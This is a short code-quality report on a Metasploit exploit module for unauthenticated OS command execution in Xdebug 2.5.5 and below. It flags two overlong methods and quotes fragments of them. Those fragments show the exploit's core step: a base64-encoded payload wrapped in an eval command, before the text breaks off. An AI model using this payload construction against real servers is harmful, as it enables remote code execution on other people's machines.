modules/exploits/unix/http/xdebug_unauth_exec.rb
Method initialize
has 35 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def initialize(info = {})
super(update_info(info,
'Name' => 'xdebug Unauthenticated OS Command Execution',
'Description' => %q{
Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
Method exploit
has 34 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
payl = Rex::Text.encode_base64("#{payload.encoded}")
cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("eval(base64_decode(\"#{payl}\"));") + "\x00"
webserver = Thread.new do
begin